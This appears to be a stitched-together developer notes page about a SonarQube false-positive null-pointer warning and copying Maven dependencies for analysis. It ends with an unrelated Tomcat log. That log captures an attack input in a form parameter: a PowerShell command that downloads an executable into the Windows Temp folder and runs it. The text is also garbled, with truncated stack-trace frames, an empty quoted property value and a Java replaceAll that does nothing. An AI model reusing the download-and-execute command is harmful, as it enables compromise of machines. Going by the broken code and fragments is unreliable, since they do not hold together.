Commons-lang StringUtils isNotBlank method still raise NPE


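public class DetectorImport {
    public String check1(Nonentity nonentity) {
        String s;
        if (nonentity == null) {
            s = null;
        } else {
            s = nonentity.getName();
        }
        // s is explicitly checked for null before it is dereferenced
        if (s != null) {
            // "(" is a regex metacharacter and must be escaped for replaceAll
            s = s.replaceAll("\\(", "(");
        }
        return s;
    }
}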


Sonarqube is raising false-positive NPE


I expect that the nonNull implementation is in another file than the main code. Unfortunately that’s the current limitation we have for this rule. If you move nonNull into the file, the FP should disappear. This problem can’t be fixed easily, so for now I suggest you mark the issue as FP in the SonarQube UI. Anyway, thanks for reporting it.

squid:S2259 : A “NullPointerException” could be thrown; “dc” is nullable here. While “dc” is checked as not null

[JAVA] squid:S2259 False Positive with Utility methods: this thread mentions that the Apache Commons StringUtils package is supported.

We currently support methods from commons-lang StringUtils (v2, and v3), guava preconditions, and java 8 methods from java.util.Objects (nonNull, isNull, requireNonNull). As we know how these methods behave, we are able to correctly handle such calls and discard similar FPs. Of course, I don’t want to force you to use such libraries to make the analyzer happy. :)

report this on Sonar Community: Commons-lang StringUtils isNotBlank method still raise NPE



Bytecode of dependencies was not provided for analysis of source files, you might end up with less precise results. Bytecode can be provided using property.



added the target “dependency:copy-dependencies” as part of the maven execution. This copied all the dependencies to the right location, then I set the property “” in our case.







The official usage documentation for this plugin, maven-dependency-plugin, gives an example; based on it:



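  • In a multi-module build, this custom outputDirectory is a relative directory, so the dependency jars are copied into the corresponding directory of each submodule;
  • Following the solution here, using the variable ${session.executionRootDirectory}/target/ forces all dependency jars to be copied to one fixed directory, but this only takes effect when running the mvn package phase.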


This involves the conceptual difference between a phase and a goal: What are Maven goals and phases and what is their difference?

A life cycle is a sequence of named phases.
Phases execute sequentially. Executing a phase means executing all previous phases.

A plugin is a collection of goals, also called MOJO (Maven Old Java Object).
Analogy: a plugin is a class and goals are methods within the class.

The default Maven lifecycle bindings define which goals are executed in each phase.

mvn [plugin-name]:[goal-name], for example mvn dependency:copy-dependencies, executes the copy-dependencies goal defined by the plugin maven-dependency-plugin. Furthermore, the corresponding configuration can be passed in through variables.



  1. Execute the goal directly: mvn dependency:copy-dependencies -DoutputDirectory=absolute/path/to/lib/dir copies all dependencies to the specified directory,
  2. Pass the directory above to the sonar variable, for example *.jar
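
The two steps above as one script, written as an added example that is not part of the original post. It assumes the analysis is started with mvn sonar:sonar and that the jars are passed through SonarJava's sonar.java.libraries property (the post does not name the property); the function names and the target/sonar-libs path are hypothetical.

```shell
#!/bin/sh
# Added example: copy dependency jars to one absolute directory, then hand
# them to the analyzer. Function names and paths are hypothetical.

# Turn a possibly relative path into an absolute one, so every module of a
# multi-module build copies into the same place instead of its own subfolder.
abs_dir() {
    mkdir -p "$1" && (cd "$1" && pwd)
}

# Print the -D argument for the analyzer, or fail if the directory holds no
# jars (an empty directory would leave the analysis without bytecode).
sonar_libs_arg() {
    dir=$1
    for jar in "$dir"/*.jar; do
        if [ -f "$jar" ]; then
            # Assumption: sonar.java.libraries is the property being set.
            printf '%s\n' "-Dsonar.java.libraries=$dir/*.jar"
            return 0
        fi
    done
    echo "no jars found in $dir" >&2
    return 1
}

# Run both steps. Not called automatically; use: analyze target/sonar-libs
analyze() {
    libs=$(abs_dir "$1") || return 1
    # Step 1: run the goal directly with an absolute outputDirectory.
    mvn dependency:copy-dependencies "-DoutputDirectory=$libs" || return 1
    # Step 2: pass the directory on (assumption: scanner is mvn sonar:sonar).
    arg=$(sonar_libs_arg "$libs") || return 1
    mvn sonar:sonar "$arg"
}
```

The wildcard stays quoted so the shell does not expand it; the analyzer receives the literal `*.jar` pattern.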


2020-03-09 13:48:49.794  INFO 2173 --- [p-nio-80-exec-3] org.apache.tomcat.util.http.Parameters   : Character decoding failed. Parameter [mail[#markup]] with value [ powershell (new-object System.Net.WebClient).DownloadFile('','%SystemRoot%/Temp/zjajlhxadgirori21058.exe');start %SystemRoot%/Temp/zjajlhxadgirori21058.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.
2020-03-10 03:44:19.910  INFO 2173 --- [p-nio-80-exec-7] o.apache.coyote.http11.Http11Processor   : Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Invalid character found in the HTTP protocol
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine( ~[tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at org.apache.coyote.http11.Http11Processor.service( ~[tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at org.apache.coyote.AbstractProcessorLight.process( [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process( [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at$SocketProcessor.doRun( [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at java.util.concurrent.ThreadPoolExecutor.runWorker( [na:1.8.0_232]
	at java.util.concurrent.ThreadPoolExecutor$ [na:1.8.0_232]
	at org.apache.tomcat.util.threads.TaskThread$ [tomcat-embed-core-9.0.21.jar!/:9.0.21]
	at [na:1.8.0_232]
